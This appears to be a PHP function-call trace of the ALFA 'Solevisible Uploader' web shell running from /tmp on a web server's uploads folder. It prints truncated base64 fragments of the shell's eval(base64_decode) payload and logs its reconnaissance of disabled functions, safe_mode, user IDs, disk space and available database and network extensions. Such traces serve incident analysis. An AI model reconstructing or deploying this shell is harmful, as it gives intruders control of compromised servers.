7	68	0	0.002993	407024	base64_encode	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	69	1	'$x = base64_decode("PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVh'
7	68	1	0.003021	409616
7	68	R			'JHggPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBZ1pXTm9ieUFpUEhScGRHeGxQbE52YkdWMmFYTnBZbXhsSUZWd2JHOWhaR1Z5UEM5MGFYUnNaVDVjYmp4aWIyUjVJR0puWTI5c2IzSTlJekF3TURBd01ENWNianhpY2o1Y2JqeGpaVzUwWlhJK1BHWnZiblFnWTI5c2IzSTlYQ0ozYUdsMFpWd2lQanhpUGxsdmRYSWdTWEFnUVdSa2NtVnpjeUJwY3p3dllqNGdQR1p2Ym5RZ1kyOXNiM0k5WENKM2FHbDBaVndpUGp3dlptOXVkRDQ4TDJObGJuUmxjajVjYmp4aWFXYytQR1p2Ym5RZ1kyOXNiM0k5WENJak4wTkdRekF3WENJK1BHTmxiblJsY2o1Y2JpSTdaV05vYnlBa1gxTkZVbFpGVWxzblVrVk5UMVJGWDBGRVJGSW5YVHRsWTJodklDSThMMk5sYm5SbGNqNDhMMlp2Ym5RK1BDOWhQanht'
6	67	1	0.003052	409584
6	67	R			'JHggPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBZ1pXTm9ieUFpUEhScGRHeGxQbE52YkdWMmFYTnBZbXhsSUZWd2JHOWhaR1Z5UEM5MGFYUnNaVDVjYmp4aWIyUjVJR0puWTI5c2IzSTlJekF3TURBd01ENWNianhpY2o1Y2JqeGpaVzUwWlhJK1BHWnZiblFnWTI5c2IzSTlYQ0ozYUdsMFpWd2lQanhpUGxsdmRYSWdTWEFnUVdSa2NtVnpjeUJwY3p3dllqNGdQR1p2Ym5RZ1kyOXNiM0k5WENKM2FHbDBaVndpUGp3dlptOXVkRDQ4TDJObGJuUmxjajVjYmp4aWFXYytQR1p2Ym5RZ1kyOXNiM0k5WENJak4wTkdRekF3WENJK1BHTmxiblJsY2o1Y2JpSTdaV05vYnlBa1gxTkZVbFpGVWxzblVrVk5UMVJGWDBGRVJGSW5YVHRsWTJodklDSThMMk5sYm5SbGNqNDhMMlp2Ym5RK1BDOWhQanht'
5	66	1	0.003082	409584
5	66	R			'JHggPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBZ1pXTm9ieUFpUEhScGRHeGxQbE52YkdWMmFYTnBZbXhsSUZWd2JHOWhaR1Z5UEM5MGFYUnNaVDVjYmp4aWIyUjVJR0puWTI5c2IzSTlJekF3TURBd01ENWNianhpY2o1Y2JqeGpaVzUwWlhJK1BHWnZiblFnWTI5c2IzSTlYQ0ozYUdsMFpWd2lQanhpUGxsdmRYSWdTWEFnUVdSa2NtVnpjeUJwY3p3dllqNGdQR1p2Ym5RZ1kyOXNiM0k5WENKM2FHbDBaVndpUGp3dlptOXVkRDQ4TDJObGJuUmxjajVjYmp4aWFXYytQR1p2Ym5RZ1kyOXNiM0k5WENJak4wTkdRekF3WENJK1BHTmxiblJsY2o1Y2JpSTdaV05vYnlBa1gxTkZVbFpGVWxzblVrVk5UMVJGWDBGRVJGSW5YVHRsWTJodklDSThMMk5sYm5SbGNqNDhMMlp2Ym5RK1BDOWhQanht'
5	69	0	0.003111	409584	define	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	914	2	'ALFA_UPLOADER'	'eval(base64_decode(\'JHggPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBZ1pXTm9ieUFpUEhScGRHeGxQbE52YkdWMmFYTnBZbXhsSUZWd2JHOWhaR1Z5UEM5MGFYUnNaVDVjYmp4aWIyUjVJR0puWTI5c2IzSTlJekF3TURBd01ENWNianhpY2o1Y2JqeGpaVzUwWlhJK1BHWnZiblFnWTI5c2IzSTlYQ0ozYUdsMFpWd2lQanhpUGxsdmRYSWdTWEFnUVdSa2NtVnpjeUJwY3p3dllqNGdQR1p2Ym5RZ1kyOXNiM0k5WENKM2FHbDBaVndpUGp3dlptOXVkRDQ4TDJObGJuUmxjajVjYmp4aWFXYytQR1p2Ym5RZ1kyOXNiM0k5WENJak4wTkdRekF3WENJK1BHTmxiblJsY2o1Y2JpSTdaV05vYnlBa1gxTkZVbFpGVWxzblVrVk5UMVJGWDBGRVJGSW5YVHRsWTJodklDSThMMk5sYm5SbGNqNDh'
5	69	1	0.003139	409688
5	69	R			TRUE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	966	_POST['charset'] = 'Windows-1251'
5	70	0	0.003167	409616	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	967	1	'diskfreespace'
5	70	1	0.003181	409656
5	70	R			TRUE
5	71	0	0.003194	409616	diskfreespace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	967	1	'/var/www/html/uploads/'
5	71	1	0.003211	409648
5	71	R			198978609152
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	967	$freeSpace = 198978609152
5	72	0	0.003238	409616	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	968	1	'disk_total_space'
5	72	1	0.003252	409656
5	72	R			TRUE
5	73	0	0.003265	409616	disk_total_space	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	968	1	'/var/www/html/uploads/'
5	73	1	0.003280	409648
5	73	R			232015802368
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	968	$totalSpace = 232015802368
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	969	$totalSpace = 232015802368
5	74	0	0.003319	409616	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	973	1	'ssh2_connect'
5	74	1	0.003332	409656
5	74	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	976	$ssh2 = '<span class=\'header_off\'> OFF </span>'
5	75	0	0.003359	409616	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	977	1	'curl_version'
5	75	1	0.003372	409656
5	75	R			TRUE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	978	$curl = '<span class=\'header_on\'> ON </span>'
5	76	0	0.003397	409616	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	981	1	'mysql_get_client_info'
5	76	1	0.003413	409656
5	76	R			FALSE
5	77	0	0.003426	409616	class_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	981	1	'mysqli'
5	77	1	0.003440	409656
5	77	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	984	$mysql = '<span class=\'header_off\'> OFF </span>'
5	78	0	0.003465	409616	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	985	1	'mssql_connect'
5	78	1	0.003478	409656
5	78	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	988	$mssql = '<span class=\'header_off\'> OFF </span>'
5	79	0	0.003504	409616	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	989	1	'pg_connect'
5	79	1	0.003517	409656
5	79	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	992	$pg = '<span class=\'header_off\'> OFF </span>'
5	80	0	0.003541	409616	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	993	1	'oci_connect'
5	80	1	0.003554	409656
5	80	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	996	$or = '<span class=\'header_off\'> OFF </span>'
5	81	0	0.003579	409616	ini_get	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	997	1	'disable_functions'
5	81	1	0.003593	410096
5	81	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
5	82	0	0.003618	409616	ini_get	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	998	1	'disable_functions'
5	82	1	0.003631	410096
5	82	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
5	83	0	0.003654	409616	ini_get	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1001	1	'safe_mode'
5	83	1	0.003667	409648
5	83	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1004	$safe_modes = '<span class=\'header_on\'>OFF</span>'
5	84	0	0.003693	409616	ini_get	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1006	1	'open_basedir'
5	84	1	0.003706	409648
5	84	R			''
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1013	$open_b = '<span class=\'header_none\'> NONE </span>'
5	85	0	0.003732	409616	ini_get	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1014	1	'safe_mode_exec_dir'
5	85	1	0.003745	409648
5	85	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1017	$safe_exe = '<span class=\'header_none\'> NONE </span>'
5	86	0	0.003771	409616	ini_get	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1018	1	'safe_mode_include_dir'
5	86	1	0.003784	409648
5	86	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1021	$safe_include = '<span class=\'header_none\'> NONE </span>'
5	87	0	0.003810	409616	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1022	1	'posix_getegid'
5	87	1	0.003823	409656
5	87	R			TRUE
5	88	0	0.003836	409616	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1029	1	'posix_getpwuid'
5	88	1	0.003849	409656
5	88	R			TRUE
5	89	0	0.003861	409616	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1029	1	'posix_geteuid'
5	89	1	0.003873	409656
5	89	R			TRUE
5	90	0	0.003886	409616	posix_geteuid	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1029	0
5	90	1	0.003899	409616
5	90	R			33
5	91	0	0.003911	409616	posix_getpwuid	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1029	1	33
5	91	1	0.003944	410448
5	91	R			['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1029	$uid = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
5	92	0	0.003989	410416	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1030	1	'posix_getgrgid'
5	92	1	0.004002	410456
5	92	R			TRUE
5	93	0	0.004014	410416	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1030	1	'posix_getegid'
5	93	1	0.004027	410456
5	93	R			TRUE
5	94	0	0.004043	410416	posix_getegid	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1030	0
5	94	1	0.004056	410416
5	94	R			33
5	95	0	0.004068	410416	posix_getgrgid	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1030	1	33
5	95	1	0.004095	411080
5	95	R			['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1030	$gid = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1031	$user = 'www-data'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1032	$uid = 33
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1033	$group = 'www-data'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1034	$gid = 33
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1036	$cwd_links = ''
5	96	0	0.004186	409696	explode	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1037	2	'/'	'/var/www/html/uploads/'
5	96	1	0.004201	410304
5	96	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1037	$path = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1039	$i = 0
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1040	$cwd_links .= '<a class=\'header_pwd\' onclick=\'g("FilesMan","'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1041	$cach_cwd_path = ''
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	$j = 0
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1046	$cwd_links .= '")\' path=\'/\' href=\'#action=fileman&path=/\'>/</a>'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1039	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1040	$cwd_links .= '<a class=\'header_pwd\' onclick=\'g("FilesMan","'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1041	$cach_cwd_path = ''
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	$j = 0
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'var/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'var/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1046	$cwd_links .= '")\' path=\'/var/\' href=\'#action=fileman&path=/var/\'>var/</a>'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1039	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1040	$cwd_links .= '<a class=\'header_pwd\' onclick=\'g("FilesMan","'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1041	$cach_cwd_path = ''
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	$j = 0
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'var/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'var/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'www/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'www/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1046	$cwd_links .= '")\' path=\'/var/www/\' href=\'#action=fileman&path=/var/www/\'>www/</a>'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1039	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1040	$cwd_links .= '<a class=\'header_pwd\' onclick=\'g("FilesMan","'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1041	$cach_cwd_path = ''
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	$j = 0
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'var/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'var/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'www/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'www/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'html/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'html/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1046	$cwd_links .= '")\' path=\'/var/www/html/\' href=\'#action=fileman&path=/var/www/html/\'>html/</a>'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1039	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1040	$cwd_links .= '<a class=\'header_pwd\' onclick=\'g("FilesMan","'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1041	$cach_cwd_path = ''
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	$j = 0
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'var/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'var/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'www/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'www/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'html/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'html/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'uploads/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'uploads/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1046	$cwd_links .= '")\' path=\'/var/www/html/uploads/\' href=\'#action=fileman&path=/var/www/html/uploads/\'>uploads/</a>'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1039	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1048	$drives = ''
5	97	0	0.004988	411048	range	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1049	2	'a'	'z'
5	97	1	0.005003	412448
5	97	R			[0 => 'a', 1 => 'b', 2 => 'c', 3 => 'd', 4 => 'e', 5 => 'f', 6 => 'g', 7 => 'h', 8 => 'i', 9 => 'j', 10 => 'k', 11 => 'l', 12 => 'm', 13 => 'n', 14 => 'o', 15 => 'p', 16 => 'q', 17 => 'r', 18 => 's', 19 => 't', 20 => 'u', 21 => 'v', 22 => 'w', 23 => 'x', 24 => 'y', 25 => 'z']
5	98	0	0.005035	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'a:\\'
5	98	1	0.005052	412456
5	98	R			FALSE
5	99	0	0.005067	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'b:\\'
5	99	1	0.005082	412456
5	99	R			FALSE
5	100	0	0.005095	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'c:\\'
5	100	1	0.005109	412456
5	100	R			FALSE
5	101	0	0.005123	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'd:\\'
5	101	1	0.005141	412456
5	101	R			FALSE
5	102	0	0.005155	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'e:\\'
5	102	1	0.005169	412456
5	102	R			FALSE
5	103	0	0.005182	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'f:\\'
5	103	1	0.005197	412456
5	103	R			FALSE
5	104	0	0.005210	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'g:\\'
5	104	1	0.005224	412456
5	104	R			FALSE
5	105	0	0.005237	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'h:\\'
5	105	1	0.005251	412456
5	105	R			FALSE
5	106	0	0.005263	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'i:\\'
5	106	1	0.005277	412456
5	106	R			FALSE
5	107	0	0.005290	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'j:\\'
5	107	1	0.005305	412456
5	107	R			FALSE
5	108	0	0.005317	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'k:\\'
5	108	1	0.005331	412456
5	108	R			FALSE
5	109	0	0.005344	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'l:\\'
5	109	1	0.005358	412456
5	109	R			FALSE
5	110	0	0.005371	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'm:\\'
5	110	1	0.005385	412456
5	110	R			FALSE
5	111	0	0.005398	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'n:\\'
5	111	1	0.005412	412456
5	111	R			FALSE
5	112	0	0.005426	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'o:\\'
5	112	1	0.005440	412456
5	112	R			FALSE
5	113	0	0.005453	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'p:\\'
5	113	1	0.005467	412456
5	113	R			FALSE
5	114	0	0.005479	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'q:\\'
5	114	1	0.005494	412456
5	114	R			FALSE
5	115	0	0.005506	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'r:\\'
5	115	1	0.005520	412456
5	115	R			FALSE
5	116	0	0.005533	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	's:\\'
5	116	1	0.005547	412456
5	116	R			FALSE
5	117	0	0.005559	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	't:\\'
5	117	1	0.005574	412456
5	117	R			FALSE
5	118	0	0.005586	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'u:\\'
5	118	1	0.005600	412456
5	118	R			FALSE
5	119	0	0.005612	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'v:\\'
5	119	1	0.005627	412456
5	119	R			FALSE
5	120	0	0.005639	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'w:\\'
5	120	1	0.005653	412456
5	120	R			FALSE
5	121	0	0.005666	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'x:\\'
5	121	1	0.005680	412456
5	121	R			FALSE
5	122	0	0.005692	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'y:\\'
5	122	1	0.005706	412456
5	122	R			FALSE
5	123	0	0.005727	412416	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'z:\\'
5	123	1	0.005743	412456
5	123	R			FALSE
5	124	0	0.005757	411048	__showicon	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1058	1	'alfamini'
5	124	1	0.005771	411048
5	124	R			'http://solevisible.com/images/alfamini.png'
5	125	0	0.006083	423448	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1069	1	'header_values'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#67ABDF'
5	125	1	0.006116	423448
5	125	R			'#67ABDF'
5	126	0	0.006212	427544	__showicon	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1069	1	'alfamini'
5	126	1	0.006227	427544
5	126	R			'http://solevisible.com/images/alfamini.png'
5	127	0	0.006244	431640	__showicon	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1069	1	'alfamini'
5	127	1	0.006257	431640
5	127	R			'http://solevisible.com/images/alfamini.png'
5	128	0	0.006273	431640	__showicon	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1069	1	'btn'
5	128	1	0.006290	431640
5	128	R			'http://solevisible.com/images/btn.png'
5	129	0	0.006307	431640	is_writable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1070	1	'/var/www/html/uploads/'
5	129	1	0.006325	431680
5	129	R			TRUE
5	130	0	0.006340	435736	alfaCssLoadColors	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1070	0
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	627	$css = ''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'shell_border'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.header'
6	131	0	0.006388	435736	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'shell_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['.header' => 'border: 7px solid {color}', '#meunlist' => 'border-color: {color}', '#hidden_sh' => 'background-color: {color}', '.ajaxarea' => 'border: 1px solid {color}', '.foot' => 'border-color: {color}']]
6	131	1	0.006424	435736
6	131	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	132	0	0.006450	435736	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'border: 7px solid {color}'
6	132	1	0.006467	435888
6	132	R			'border: 7px solid #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border: 7px solid #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.header{border: 7px solid #0E304A}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '#meunlist'
